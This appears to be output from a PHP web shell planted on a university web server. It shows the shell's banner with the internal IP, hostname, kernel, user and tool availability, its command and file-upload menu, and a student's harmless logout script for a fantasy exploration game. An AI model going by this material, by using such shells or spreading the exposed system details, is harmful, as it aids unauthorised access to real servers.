Server IP : 172.16.15.8 / Your IP : 18.224.55.63 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/kvtillotson/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- projectLogout.php - Kristin Tillotson --> <?php session_start(); session_destroy(); print "<A HREF=projectCharacterSelect.php>Log In</A>"; ?> <CENTER> <A HREF=project.php> Homepage</A> | <A HREF=projectAreas.php> Areas</A> | <A HREF=projectCharacterDisplay.php> Characters</A><HR> <H2><Font color=green> Souvenirs: A Fantasy Exploration Game </font></H2><HR> Welcome to this rather detail lacking little game in which you play as a <A HREF=projectCharacterDisplay.php> character</A> who can explore a few <A HREF=projectAreas.php> areas </A> and collect a few items. </center> <A HREF=index.html> Course Home </A>